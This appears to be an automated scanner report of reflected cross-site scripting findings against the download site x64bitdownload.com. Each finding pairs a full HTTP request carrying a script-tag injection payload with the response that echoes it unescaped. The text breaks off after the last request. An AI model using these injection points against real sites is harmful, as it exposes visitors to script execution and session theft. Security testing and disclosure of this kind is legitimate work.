HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:36:27 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categories9a1be"><script>alert(1)</script>1593af6f4d8/free-64-bit-web-development-downloads-14-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bca45"><script>alert(1)</script>88a1d2dd8e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-web-development-downloads-14-0-d.htmlbca45"><script>alert(1)</script>88a1d2dd8e0 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:37:26 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:47:45 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2214%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 89994
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-web-development-downloads-14-0-d.htmlbca45"><script>alert(1)</script>88a1d2dd8e0" /> ...[SNIP]...
1.221. http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80afd"><script>alert(1)</script>c425ef0f66e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-web-development-downloads-14-0-d.html?80afd"><script>alert(1)</script>c425ef0f66e=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:34:06 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:44:14 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2214%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 89997
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-web-development-downloads-14-0-d.html?80afd"><script>alert(1)</script>c425ef0f66e=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 218d1"><script>alert(1)</script>4fe331af1de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories218d1"><script>alert(1)</script>4fe331af1de/free-64-bit-widgets-downloads-304-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:38:54 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21328
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categories218d1"><script>alert(1)</script>4fe331af1de/free-64-bit-widgets-downloads-304-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba48e"><script>alert(1)</script>61cde841274 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-widgets-downloads-304-0-d.htmlba48e"><script>alert(1)</script>61cde841274 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:40:36 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:51:10 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22304%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 73743
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-widgets-downloads-304-0-d.htmlba48e"><script>alert(1)</script>61cde841274" /> ...[SNIP]...
1.224. http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6112f"><script>alert(1)</script>21955c1c69b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-widgets-downloads-304-0-d.html?6112f"><script>alert(1)</script>21955c1c69b=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:34:51 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:44:55 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22304%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 73746
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-widgets-downloads-304-0-d.html?6112f"><script>alert(1)</script>21955c1c69b=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27828"><script>alert(1)</script>f86c420dbde was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact.html27828"><script>alert(1)</script>f86c420dbde HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:26:24 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21287
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/contact.html27828"><script>alert(1)</script>f86c420dbde" /> ...[SNIP]...
1.226. http://www.x64bitdownload.com/contact.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/contact.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa263"><script>alert(1)</script>331e6222b82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact.html?aa263"><script>alert(1)</script>331e6222b82=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:22:51 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23150
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/contact.html?aa263"><script>alert(1)</script>331e6222b82=1" /> ...[SNIP]...
The value of the subject request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be1b9"><script>alert(1)</script>4fd62328ec8 was submitted in the subject parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact.html?subject=Advertising+inquirybe1b9"><script>alert(1)</script>4fd62328ec8 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:23:10 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23219
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/contact.html?subject=Advertising+inquirybe1b9"><script>alert(1)</script>4fd62328ec8" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b3ae"><script>alert(1)</script>c6880b6a8ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /download9b3ae"><script>alert(1)</script>c6880b6a8ca/t-64-bit-ozum-download-lhtivuds.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:46:26 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21320
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/download9b3ae"><script>alert(1)</script>c6880b6a8ca/t-64-bit-ozum-download-lhtivuds.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60197"><script>alert(1)</script>0962c697c9d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /download/t-64-bit-ozum-download-lhtivuds.html60197"><script>alert(1)</script>0962c697c9d HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:47:27 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:57:41 GMT Cache-Control: max-age=600 Pragma: cache Connection: close Content-Type: text/html; charset=UTF-8 X-Pad: avoid browser bug Content-Length: 24926
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/download/t-64-bit-ozum-download-lhtivuds.html60197"><script>alert(1)</script>0962c697c9d" /> ...[SNIP]...
1.230. http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/download/t-64-bit-ozum-download-lhtivuds.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 609f9"><script>alert(1)</script>bd02fd97db3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /download/t-64-bit-ozum-download-lhtivuds.html?609f9"><script>alert(1)</script>bd02fd97db3=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:44:09 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:54:14 GMT Cache-Control: max-age=600 Pragma: cache Connection: close Content-Type: text/html; charset=UTF-8 X-Pad: avoid browser bug Content-Length: 24929
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/download/t-64-bit-ozum-download-lhtivuds.html?609f9"><script>alert(1)</script>bd02fd97db3=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be9bd"><script>alert(1)</script>d2897fb4cc0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloadsbe9bd"><script>alert(1)</script>d2897fb4cc0/t-64-bit-communitymate-download-qeakzpwv.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:21:23 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21330
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/downloadsbe9bd"><script>alert(1)</script>d2897fb4cc0/t-64-bit-communitymate-download-qeakzpwv.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a075"><script>alert(1)</script>b0edf73ede1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-communitymate-download-qeakzpwv.html1a075"><script>alert(1)</script>b0edf73ede1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:21:56 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 55738
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-communitymate-download-qeakzpwv.html1a075"><script>alert(1)</script>b0edf73ede1"/> ...[SNIP]...
1.233. http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 528e0"><script>alert(1)</script>cb345b92cc2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-communitymate-download-qeakzpwv.html?528e0"><script>alert(1)</script>cb345b92cc2=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:18:26 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 55744
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-communitymate-download-qeakzpwv.html?528e0"><script>alert(1)</script>cb345b92cc2=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5108"><script>alert(1)</script>438beac92ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloadse5108"><script>alert(1)</script>438beac92ff/t-64-bit-cyberlink-youcam-download-gspvirzx.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:23:55 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21333
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/downloadse5108"><script>alert(1)</script>438beac92ff/t-64-bit-cyberlink-youcam-download-gspvirzx.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14f07"><script>alert(1)</script>b0b929cccfa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html14f07"><script>alert(1)</script>b0b929cccfa HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:24:39 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 56805
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html14f07"><script>alert(1)</script>b0b929cccfa"/> ...[SNIP]...
1.236. http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2918"><script>alert(1)</script>0c97ca17470 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html?b2918"><script>alert(1)</script>0c97ca17470=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:21:06 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 56811
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html?b2918"><script>alert(1)</script>0c97ca17470=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12bf9"><script>alert(1)</script>6fe8131d792 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads12bf9"><script>alert(1)</script>6fe8131d792/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:23:11 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21352
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/downloads12bf9"><script>alert(1)</script>6fe8131d792/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 742ce"><script>alert(1)</script>f2561d7c8fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html742ce"><script>alert(1)</script>f2561d7c8fe HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:24:07 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 59993
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html742ce"><script>alert(1)</script>f2561d7c8fe"/> ...[SNIP]...
1.239. http://www.x64bitdownload.com/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6bbf"><script>alert(1)</script>75abb52cf6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html?e6bbf"><script>alert(1)</script>75abb52cf6c=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
